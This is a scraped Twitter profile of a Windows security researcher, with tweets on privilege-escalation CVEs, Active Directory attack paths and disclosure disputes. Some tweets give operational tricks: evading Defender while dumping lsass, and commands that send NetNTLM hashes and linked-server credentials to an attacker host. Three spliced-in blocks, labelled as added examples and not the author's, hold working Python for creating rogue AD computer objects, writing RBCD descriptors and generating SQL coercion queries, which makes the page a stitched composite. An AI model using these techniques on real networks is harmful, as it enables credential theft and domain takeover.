Filip Dragovic Profile
Filip Dragovic

@filip_dragovic

5,920
Followers
1,143
Following
173
Media
2,740
Statuses

Joined March 2018
@filip_dragovic
Filip Dragovic
2 years
Spooler service disabled, RPC filters installed to prevent PetitPotam, and File Server VSS Agent Service not installed, but you still want to relay DC authentication to ADCS? Don't worry, MS-DFSNM has your back ;)
32
533
1K
@filip_dragovic
Filip Dragovic
2 years
One funny way to use procdump to dump lsass and not get flagged by Defender is to redirect it to an SMB share where only the current user can authenticate (you can use a dummy user with runas /netonly). Defender will not be able to scan the dump file and will not flag it.
9
132
471
@filip_dragovic
Filip Dragovic
2 months
So MSRC first said that they cannot reproduce, now they say that no security boundary is crossed. Tested this on a few different machines and it was successful on all of them. This is a bug in GamingServices, a non-default service, so impact is not high.
17
115
421
@filip_dragovic
Filip Dragovic
4 months
You can find the PoC here
@MDSecLabs
MDSec
4 months
Exploiting CVE-2024-20656, a Local Privilege Escalation in the VSStandardCollectorService150 Service - new research from @filip_dragovic
2
119
354
9
129
400
@filip_dragovic
Filip Dragovic
1 year
One of the paths to DA in the current engagement. Run gowitness and take screenshots of the servers in scope. Identified Cisco Unified Call Manager on one of the servers. Used SeeYouCM Thief to enumerate AD users. Used kerbrute to spray passwords and got one hit. 1/n
15
77
358
@filip_dragovic
Filip Dragovic
1 year
Here is the PoC for CVE-2022-41120. I combined an arbitrary file delete and a limited arbitrary file write to get code execution as NT AUTHORITY\SYSTEM.
4
134
343
@filip_dragovic
Filip Dragovic
2 years
Just another AV utility that can be used to dump process memory. :)
3
99
310
@filip_dragovic
Filip Dragovic
9 months
Here is the PoC for the LPE in Windows Error Reporting Service, CVE-2023-36874
8
134
307
@filip_dragovic
Filip Dragovic
2 years
As ZoneAlarm decided not to fix an LPE vulnerability in their software, I am releasing the PoC
11
95
290
@filip_dragovic
Filip Dragovic
1 year
Here is the PoC for CVE-2023-21752, an arbitrary file delete in Windows Backup service.
8
104
293
@filip_dragovic
Filip Dragovic
27 days
I published my PoC for CVE-2023-36047 as MSRC fixed the bypass today, tracked as CVE-2024-21447. With some modification it can be ported to CVE-2024-21447.
2
96
256
@filip_dragovic
Filip Dragovic
2 months
So apparently MSRC now thinks this is a valid issue 🤔 Lmao
@filip_dragovic
Filip Dragovic
2 months
So MSRC first said that they cannot reproduce, now they say that no security boundary is crossed. Tested this on a few different machines and it was successful on all of them. This is a bug in GamingServices, a non-default service, so impact is not high.
17
115
421
19
35
236
@filip_dragovic
Filip Dragovic
4 months
First CVE in 2024 :) This was an arbitrary file DACL reset vulnerability with a little twist, and that's that file permissions were copied from the parent folder, which prevented me from using the usual suspects (PrintConfig.dll etc.) during the exploitation.
11
41
230
@filip_dragovic
Filip Dragovic
5 years
Have valid creds for an MSSQL DB and xp_dirtree is enabled? Use msdat and Responder to capture NetNTLM hashes:
1: responder -I eth0 -v
2: ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name $SHARE
#infosec #hacking
6
105
228
@filip_dragovic
Filip Dragovic
2 years
Here is a small piece of code to dump the SAM/SYSTEM/SECURITY hives from a remote host when you have SeBackup/SeRestore privileges (Backup Operators). The files will be saved on the remote host, but Backup Operators can access c$ and download them.
2
87
224
@filip_dragovic
Filip Dragovic
2 years
Just another way to abuse the SeImpersonate privilege... The hard work was done by crisprss (don't know the Twitter handle), I simply found a way to weaponize it. :)
4
94
220
@filip_dragovic
Filip Dragovic
11 months
Here is my PoC for CVE-2023-29343 / Arbitrary File Write in Sysmon v14.14, which was fixed about 2 months ago.
1
69
212
@filip_dragovic
Filip Dragovic
1 year
I reported a bypass for a lame patch in Sysmon. MSRC confirmed the bypass, they released a new Sysmon version that apparently fixes the bug. And this is the response I get for asking if they will give a CVE, as I didn't get any notification from them that they fixed the bug.
19
18
209
@filip_dragovic
Filip Dragovic
2 years
CVE-2022-26923 when you have SYSTEM on a server/workstation. Credits: @ly4k_
3
65
200
@filip_dragovic
Filip Dragovic
11 months
Here is my PoC for CVE-2023-20178 / Arbitrary File Delete vulnerability in Cisco Secure Client and Cisco AnyConnect, which was fixed earlier this month.
2
62
195
@filip_dragovic
Filip Dragovic
1 year
First bug that I reported to MSRC :)
17
16
179
@filip_dragovic
Filip Dragovic
2 years
TIL: If you have GenericAll rights on an AD container, in this case Program Data (I assume it works on others too), you can add new computer/user objects even if you are not DA / SeMachineAccountPrivilege is disabled.
7
48
167
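Added example, not the tweet author's code: what the LDAP add for such a computer object looks like when it is placed under a container you hold GenericAll on instead of the default CN=Computers. The attribute construction is stdlib only; the actual submission assumes the ldap3 library and the hypothetical names (corp.local, "CN=Program Data,DC=corp,DC=local", EVILPC) are placeholders. The same dNSHostName attribute is what the CVE-2022-26923 tweet above relies on controlling.

```python
# Added example (not the tweet author's code): build the LDAP entry for a new
# computer object under an attacker-controlled container. Only the attribute
# construction runs offline; add_computer() assumes ldap3 is installed.
from typing import Dict, Tuple

# userAccountControl bit that marks a machine account (WORKSTATION_TRUST_ACCOUNT).
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000


def unicode_pwd(password: str) -> bytes:
    """AD's unicodePwd attribute must be the password wrapped in double quotes
    and encoded as UTF-16LE; sending plain UTF-8 fails with WILL_NOT_PERFORM."""
    return f'"{password}"'.encode("utf-16-le")


def build_computer_entry(container_dn: str, hostname: str, domain: str,
                         password: str) -> Tuple[str, Dict[str, object]]:
    """Return (dn, attributes) for a computer object named <hostname>$ placed in
    container_dn, e.g. "CN=Program Data,DC=corp,DC=local" (hypothetical)."""
    name = hostname.rstrip("$").upper()
    fqdn = f"{name.lower()}.{domain.lower()}"
    dn = f"CN={name},{container_dn}"
    attrs: Dict[str, object] = {
        "objectClass": ["top", "person", "organizationalPerson", "user", "computer"],
        "cn": name,
        "sAMAccountName": f"{name}$",
        "dNSHostName": fqdn,
        "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
        "servicePrincipalName": [f"HOST/{fqdn}", f"RestrictedKrbHost/{fqdn}",
                                 f"HOST/{name}", f"RestrictedKrbHost/{name}"],
        # unicodePwd can be set in the same add when the bind is over LDAPS
        # (or NTLM signed+sealed); over plain LDAP the DC refuses it.
        "unicodePwd": unicode_pwd(password),
    }
    return dn, attrs


def add_computer(server: str, bind_user: str, bind_password: str,
                 container_dn: str, hostname: str, domain: str, password: str) -> bool:
    """Submit the entry with ldap3 (assumption: pip install ldap3). The import is
    deferred so the rest of this file works offline. Returns True on success."""
    import ldap3
    srv = ldap3.Server(server, port=636, use_ssl=True, get_info=ldap3.NONE)
    conn = ldap3.Connection(srv, user=bind_user, password=bind_password,
                            authentication=ldap3.NTLM, auto_bind=True)
    dn, attrs = build_computer_entry(container_dn, hostname, domain, password)
    ok = conn.add(dn, attributes=attrs)
    if not ok:
        print("add failed:", conn.result)
    conn.unbind()
    return ok
```

Defenders can audit for this by alerting on computer objects whose parent is anything other than CN=Computers or an OU that provisioning normally uses, and by reviewing who holds GenericAll/CreateChild on containers.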
@filip_dragovic
Filip Dragovic
5 years
Successfully passed #OSCP exam!! Thanks @offsectraining for this great experience! Also big thanks to @EricaZeli and @fasthm00 for supporting me from beginning <3 <3. #PWK #offsec
13
11
159
@filip_dragovic
Filip Dragovic
2 months
14 months later 50kg/110lbs lost 🥳 Last year in January was 155kg/341lbs, currently at 104.8/230lbs
@filip_dragovic
Filip Dragovic
11 months
I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂
6
0
59
18
0
152
@filip_dragovic
Filip Dragovic
11 days
Short blog post for the EoP in VirtualBox
@MDSecLabs
MDSec
11 days
New post on the blog… Exploiting CVE-2024-21111 : Local Privilege Escalation in Oracle VirtualBox by @filip_dragovic
2
87
216
0
32
129
@filip_dragovic
Filip Dragovic
3 years
Finished #APTLabs from @hackthebox_eu. Best lab I played so far! Really enjoyed it, great work @cube0x0 !!!
12
6
124
@filip_dragovic
Filip Dragovic
1 year
PoC for arbitrary file delete/move in the #Razer Macro module that is not fixed, as their bug hunting team does not consider this a bug but an exploit 🙃.
7
46
121
@filip_dragovic
Filip Dragovic
2 years
PoC for CVE-2022-3368, an arbitrary file move bug I found in Avira Security.
0
37
121
@filip_dragovic
Filip Dragovic
1 year
For those interested in details about the Sysmon vulnerability, at the moment I cannot share any details, as the fix implemented by MSRC is pretty lazy and the vulnerability still exists; MSRC has been notified about the bypass
@filip_dragovic
Filip Dragovic
1 year
First bug that I reported to MSRC :)
17
16
179
4
23
120
@filip_dragovic
Filip Dragovic
10 months
Yay, I was awarded a $6,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder
14
2
113
@filip_dragovic
Filip Dragovic
3 months
When you delete the VM with your PoC that you forgot to back up
6
7
104
@filip_dragovic
Filip Dragovic
5 years
Thanks @offsectraining, 😊
12
4
101
@filip_dragovic
Filip Dragovic
3 years
Can trigger authentication on a DC without credentials with PetitPotam but there is no ADCS? Relay to SMB on other hosts with the socks option in ntlmrelayx and use PrintNightmare through the relayed connection, triggering it without having any credentials 🙃
4
28
99
@filip_dragovic
Filip Dragovic
1 year
Decided to go with OSED in 2023. This is gonna be fun!
9
2
95
@filip_dragovic
Filip Dragovic
11 months
Fourth LPE in 8 days 🙃
6
1
81
@filip_dragovic
Filip Dragovic
11 months
And the 12th vuln in Microsoft confirmed :)
3
1
79
@filip_dragovic
Filip Dragovic
1 year
MSRC corrected this. Thank you @msftsecresponse !
@filip_dragovic
Filip Dragovic
1 year
I reported a bypass for a lame patch in Sysmon. MSRC confirmed the bypass, they released a new Sysmon version that apparently fixes the bug. And this is the response I get for asking if they will give a CVE, as I didn't get any notification from them that they fixed the bug.
19
18
209
11
2
78
@filip_dragovic
Filip Dragovic
10 months
Last year I decided to find some bugs in Microsoft products and I am happy that I was able to get on the MSRC MVR list for 2023 🥳
8
0
74
@filip_dragovic
Filip Dragovic
5 months
11 months in and 101lbs/46kg lost :)
@filip_dragovic
Filip Dragovic
11 months
I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂
6
0
59
11
1
73
@filip_dragovic
Filip Dragovic
10 months
Another LPE :D I'm glad I didn't give up on this bug yesterday when I was 90% sure it wasn't exploitable :))
3
0
67
@filip_dragovic
Filip Dragovic
10 months
Six months in 27kg/59.5lbs down 🎉
@filip_dragovic
Filip Dragovic
11 months
I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂
6
0
59
8
1
65
@filip_dragovic
Filip Dragovic
1 year
Both of these have been accepted and my goal to find 10+ bugs in Microsoft in one year is now completed :)
@filip_dragovic
Filip Dragovic
1 year
It's 4:30 AM and I have submitted my second vulnerability report to MSRC for today. Hopefully they will get accepted :). Now time for some sleep :D
2
1
56
3
2
65
@filip_dragovic
Filip Dragovic
2 months
This is fixed now
@filip_dragovic
Filip Dragovic
2 months
So apparently MSRC now thinks this is a valid issue 🤔 Lmao
19
35
236
4
3
63
@filip_dragovic
Filip Dragovic
9 months
ESET fixed a vulnerability I found a couple of months ago. This was an arbitrary folder content delete bug, which I was able to turn into an arbitrary file move and gain a SYSTEM shell.
1
5
61
@filip_dragovic
Filip Dragovic
3 months
Another LPE report submitted and now it's time to sleep :D
4
0
60
@filip_dragovic
Filip Dragovic
4 years
Thank you @SecurityTube and @nikhil_mitt for a very interesting and fun lab and exam!!!
4
3
58
@filip_dragovic
Filip Dragovic
11 months
I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂
6
0
59
@filip_dragovic
Filip Dragovic
3 months
It seems this will be publicly disclosed very soon :D
@filip_dragovic
Filip Dragovic
3 months
Another LPE report submitted and now it's time to sleep :D
4
0
60
6
2
57
@filip_dragovic
Filip Dragovic
1 year
It's 4:30 AM and I have submitted my second vulnerability report to MSRC for today. Hopefully they will get accepted :). Now time for some sleep :D
2
1
56
@filip_dragovic
Filip Dragovic
6 months
Looks like Microsoft killed the abuse of arbitrary folder creation using the SxS assembly trick. Tested wermgr.exe/narrator.exe/werfault.exe and some of my own that were not public, and they will not try to open the .local directory on fully updated Win10/Win11. :(
2
9
55
@filip_dragovic
Filip Dragovic
3 months
I have a feeling that people at Microsoft make Azure more complicated on purpose. Like wtf is this shit 🤬
7
2
51
@filip_dragovic
Filip Dragovic
1 year
Today it took more time to set up the VPN than getting DA xD
5
4
50
@filip_dragovic
Filip Dragovic
1 year
I was able to leak the credentials of the user configured for the linked server using the following query: SELECT * FROM OPENQUERY(linkedserver, 'SELECT sAMAccountName FROM ''LDAP://<kali ip>/DC=somedomain,DC=local'''). 3/n
3
1
47
@filip_dragovic
Filip Dragovic
2 years
Yeah, KrbRelayUp is a nice automation tool, but the KrbRelay framework was released 2.5+ months ago and everyone reacts like they never saw this before.
2
2
45
@filip_dragovic
Filip Dragovic
9 months
Congratulations to all researchers! This is the first time for me to be on the MSRC MVR list (#38 overall).
@msftsecresponse
Security Response
9 months
Congratulations to our MSRC 2023 Most Valuable Researchers! Thank you to all the researchers who have helped secure our customers. 👏🎉 Check out our blog for the full list:
3
25
101
5
1
44
@filip_dragovic
Filip Dragovic
2 years
Anyone have an idea why it's possible to relay to yourself when using KrbRelay? I am on the DC and relayed auth to the same DC on the LDAP service. This should not work, right? Or is relay to the same host only restricted for NTLM?
1
6
43
@filip_dragovic
Filip Dragovic
6 years
WOW, time flies fast, it's been over a year since I joined @hackthebox_eu !! BIG THANKS to the @hackthebox_eu team for this priceless experience
1
3
42
@filip_dragovic
Filip Dragovic
5 months
Thanks @msftsecresponse for the great swag!
4
0
42
@filip_dragovic
Filip Dragovic
3 months
Nice work! 🔥
@s1zzzz
s1zz
3 months
Discovered and exploited an arbitrary file delete vulnerability that led to SYSTEM level privileges. Thanks to the goat @filip_dragovic.
8
30
173
0
3
38
@filip_dragovic
Filip Dragovic
1 year
@DebugPrivilege Compromised a user that could set RBCD on the DC, but all domain admins were in the Protected Users group, so I impersonated the DC itself and did a DCSync :)
3
1
41
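Added example, not the tweet author's code: the value that "setting RBCD on the DC" actually writes. msDS-AllowedToActOnBehalfOfOtherIdentity holds a self-relative security descriptor whose DACL lists the SIDs allowed to delegate to the object; once an attacker-controlled account's SID is in there, S4U2Self/S4U2Proxy can mint a ticket to the DC as the DC's own machine account, which is not in Protected Users and holds replication rights. The encoding below is pure stdlib (it matches what impacket's rbcd.py produces for the same input); the SIDs in the test are made up, and the LDAP modify itself is left to whatever tooling is in use.

```python
# Added example (not the tweet author's code): build and parse the security
# descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity.
import struct
from typing import List

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
RBCD_ACCESS_MASK = 0x000F01FF          # full control mask used by RBCD tooling
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"  # owner SID placed in the descriptor


def sid_to_bytes(sid: str) -> bytes:
    """Encode a textual SID (S-1-<authority>-<sub>...) into its binary form:
    revision, sub-authority count, 6-byte big-endian authority, LE subs."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"bad SID: {sid}")
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
    for s in subs:
        out += struct.pack("<I", s)
    return out


def bytes_to_sid(data: bytes) -> str:
    rev, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)


def build_rbcd_sd(allowed_sids: List[str]) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR: 20-byte header, owner SID, then a DACL
    with one ACCESS_ALLOWED_ACE per SID that may delegate to this object."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        ace_size = 8 + len(sid_b)  # AceType, AceFlags, AceSize, Mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size,
                            RBCD_ACCESS_MASK) + sid_b
    # ACL header: AclRevision=2, Sbz1, AclSize, AceCount, Sbz2
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    owner_off = 20
    dacl_off = owner_off + len(owner)
    # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner + acl


def allowed_sids_from_sd(sd: bytes) -> List[str]:
    """Decode the SIDs already granted, so an attacker appends instead of
    clobbering a legitimate value and a defender can audit what is there."""
    control = struct.unpack_from("<H", sd, 2)[0]
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    pos = dacl_off + 8
    sids = []
    for _ in range(count):
        ace_size = struct.unpack_from("<H", sd, pos + 2)[0]
        sids.append(bytes_to_sid(sd[pos + 8: pos + ace_size]))
        pos += ace_size
    return sids
```

On the detection side the same parser is the useful part: diff msDS-AllowedToActOnBehalfOfOtherIdentity on domain controllers and other tier-0 computer objects, and treat any SID appearing there that is not an expected service account as an incident.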
@filip_dragovic
Filip Dragovic
8 months
When you see a CVE for a bug you failed to exploit
2
2
41
@filip_dragovic
Filip Dragovic
7 months
Do people really buy UAC bypasses?? LOL
@DailyDarkWeb
Dark Web Intelligence
7 months
A threat actor claims to be selling a UAC bypass exploit. It works on all Windows 10/Server. Price: $5000 #DarkWeb #exploit
3
9
44
8
0
39
@filip_dragovic
Filip Dragovic
1 year
Dumping LSA secrets from compromised hosts resulted in clear text credentials of a service account that is a member of the Domain Admins group \o/ 5/5
0
1
39
@filip_dragovic
Filip Dragovic
14 days
This was a fun bug. Tomorrow I will post a short blog post about it.
@mansk1es
MANSK1ES
14 days
Oracle VirtualBox Prior 7.0.16 LPE Exploit. Finding this bug was very cool :)
6
63
195
0
4
37
@filip_dragovic
Filip Dragovic
8 months
When you find an EoP bug but you are too lazy to write the exploit and report it.
3
0
37
@filip_dragovic
Filip Dragovic
9 months
This one was fun. Hopefully I will make a blog post on how I discovered and exploited this vulnerability to gain SYSTEM privileges
2
0
37
@filip_dragovic
Filip Dragovic
3 months
Me: submit a report with a PoC and a PoC video of how to do everything. Triage: (Do the opposite of what I showed in the video) Can't reproduce. FFS, how do these people get their jobs
3
1
34
@filip_dragovic
Filip Dragovic
7 months
Had a really great time at #redtreat23, thanks to @domchell @StanHacked @MarcOverIP for organizing this event!
0
0
34
@filip_dragovic
Filip Dragovic
4 years
Awesome course, recommend it to everyone who wants to get started in Active Directory
@SecurityTube
Pentester Academy
4 years
Congratulations to @filip_dragovic for clearing our Certified Red Team Professional exam! #ADLab #CRTP cc @nikhil_mitt
2
1
12
2
4
31
@filip_dragovic
Filip Dragovic
5 months
🤣🤣🤣🤣🤣🤣🤣🤣
0
5
32
@filip_dragovic
Filip Dragovic
10 months
This quarter finished with 4 valid reports and 100pts. Congratulations to all other researchers!
@msftsecresponse
Security Response
10 months
Congratulations to all the researchers recognized in this quarter’s MSRC 2023 Q2 Security Researcher Leaderboard! For more information, check out our blog post: #cybersecurity #securityresearch #msrc
3
10
42
1
0
33
@filip_dragovic
Filip Dragovic
1 year
Useful blog posts @n00py1 @DevinCasadey 🙏🙏
@filip_dragovic
Filip Dragovic
1 year
One of the paths to DA in the current engagement. Run gowitness and take screenshots of the servers in scope. Identified Cisco Unified Call Manager on one of the servers. Used SeeYouCM Thief to enumerate AD users. Used kerbrute to spray passwords and got one hit. 1/n
15
77
358
0
6
32
@filip_dragovic
Filip Dragovic
1 year
Seems that HTB now only releases new ProLabs on their business platform 🙄. Two years, no new ProLabs on the main platform.
8
0
30
@filip_dragovic
Filip Dragovic
1 year
When you can't sleep and realize you could have had DA two days ago but you're a fking idiot 🤬🤬🤬
7
2
30
@filip_dragovic
Filip Dragovic
6 months
This one is not an EoP out of the box, but in certain conditions it can be xD
1
2
29
@filip_dragovic
Filip Dragovic
1 month
When will I learn not to test stuff on my personal machine. I really know how to shoot myself in the foot
5
0
27
@filip_dragovic
Filip Dragovic
6 years
Finished with #TempleofDoom !!! Thanks to @0katz for making this VM!!! #Boot2root #CTF #OSCP
1
6
29
@filip_dragovic
Filip Dragovic
9 months
@domchell @MDSecLabs @exploitph Thank you Dom, very excited to join the team :)
5
0
29
@filip_dragovic
Filip Dragovic
9 days
This is gonna be fun! See you there :)
@x33fcon
/ˈziːf-kɒn/
12 days
🎉 Exciting news! 🎉 The agenda for #x33fcon has just been announced! 📢 Don't miss out on insightful #talks , engaging #workshops , and #networking opportunities. Who's presenting this year? Check it out: #cybersecurity #conference #workshops #training
0
15
44
2
1
29
@filip_dragovic
Filip Dragovic
2 months
What to do when MSRC fails to reproduce a bug that was successfully confirmed on multiple laptops and they closed the 2 cases I opened??
13
3
29
@filip_dragovic
Filip Dragovic
2 months
ffs
3
1
26
@filip_dragovic
Filip Dragovic
1 year
And got DA yayaya!
@filip_dragovic
Filip Dragovic
1 year
When you can't sleep and realize you could have had DA two days ago but you're a fking idiot 🤬🤬🤬
7
2
30
3
0
26
@filip_dragovic
Filip Dragovic
2 months
@0gtweet One of the easiest is to change the ImagePath of the seclogon service; by default it's started on demand and can be started by a low-privilege user
1
1
26
@filip_dragovic
Filip Dragovic
9 months
Feels good to be able to bench more (slightly more) than my current body weight 😊. The last time I was able to do that was almost 4 years ago. Now it's time to chase old PB's and set some new ones!
0
0
25
@filip_dragovic
Filip Dragovic
8 months
Today was chest day. Incline bench: 5x5 225lbs. Incline chest press machine: 3x8 225lbs. Pec fly: 3x10-12 170lbs. Dips: 3x8 (bw 266). Triceps pushdown: 3x10 150lbs. Triceps ext: 3x90 lbs. Almost 8 months of caloric deficit and around 74lbs lost. Hopefully, will hit 15% bf in 4-6 months
8
0
24
@filip_dragovic
Filip Dragovic
11 months
If it only takes ~1h to find an EoP due to shitty bloatware, do you really need a bug in Windows to get to SYSTEM lol
1
2
25
@filip_dragovic
Filip Dragovic
3 years
@n00py1 I think that smbpasswd can also be used for this
1
0
25
@filip_dragovic
Filip Dragovic
1 year
Used the obtained credentials to try to authenticate on the available MSSQL servers. Got a few successful logins. On one of the SQL servers there were a few linked servers configured, a few of them using the ADSDSOObject provider (for integration with AD). 2/n
2
0
24
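Added example, not the tweet author's code, covering both SQL Server coercion tricks on this page: the xp_dirtree NetNTLM capture from the msdat/Responder tweet and the linked-server OPENQUERY from the "3/n" tweet, where an ADSI (ADSDSOObject) linked server is pointed at an attacker "LDAP" host so it binds with its stored credentials. The non-obvious part is the quoting: every OPENQUERY hop wraps the previous statement in another T-SQL string, so single quotes double at each level. Host names, share names and linked-server names below are placeholders, and sending the statements (via any MSSQL client) is left out.

```python
# Added example (not the tweet author's code): build the T-SQL for making a
# SQL Server authenticate outbound to an attacker-controlled host, with correct
# quote doubling through an arbitrary chain of linked servers.
from typing import List


def tsql_str(value: str) -> str:
    """Quote a value as a T-SQL string literal, doubling embedded quotes."""
    return "'" + value.replace("'", "''") + "'"


def xp_dirtree_query(attacker_host: str, share: str = "share") -> str:
    """Force the SQL Server service account to connect to \\attacker\share
    (SMB, NetNTLMv2 captured by Responder as in the msdat tweet)."""
    return "EXEC master..xp_dirtree " + tsql_str(f"\\\\{attacker_host}\\{share}")


def adsi_ldap_query(attacker_host: str, base_dn: str,
                    attribute: str = "sAMAccountName") -> str:
    """Inner ADSI query: the provider binds to LDAP://<host> using the
    credentials configured on the linked server, which a rogue LDAP listener
    on attacker_host receives."""
    return f"SELECT {attribute} FROM " + tsql_str(f"LDAP://{attacker_host}/{base_dn}")


def openquery(linked_server: str, inner_sql: str) -> str:
    """Run inner_sql on linked_server (one more level of string quoting)."""
    return f"SELECT * FROM OPENQUERY({linked_server}, {tsql_str(inner_sql)})"


def chain_openquery(hops: List[str], inner_sql: str) -> str:
    """Wrap inner_sql through a chain of linked servers, first hop outermost.
    Each hop re-quotes the previous statement, so quotes multiply by two."""
    sql = inner_sql
    for hop in reversed(hops):
        sql = openquery(hop, sql)
    return sql


def credential_leak_query(hops: List[str], attacker_host: str, base_dn: str) -> str:
    """Full statement ending at the ADSI linked server (last element of hops)."""
    return chain_openquery(hops, adsi_ldap_query(attacker_host, base_dn))
```

For a single ADSI linked server, credential_leak_query(["linkedserver"], "<kali ip>", "DC=somedomain,DC=local") reproduces the exact statement from the tweet. Defensively, both primitives are visible in SQL audit or Extended Events: xp_dirtree with a UNC argument, and OPENQUERY text containing an LDAP:// path whose host is not a domain controller.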
@filip_dragovic
Filip Dragovic
3 years
Big thanks to all @hackthebox_eu staff for creating amazing content!!
@hackthebox_eu
Hack The Box
3 years
#APTLabs FIRST BLOOD! Congrats @filip_dragovic , just 14 DAYS after launch! 🎉 Will U be next? #HTB #ProLabs Setup Fee 50% OFF until December 31st! ➡️ Keep your #Hacking bloody 🧛 #GoProThisDecember #HackTheBox #CyberSecurity #Pentesting
5
10
70
1
1
24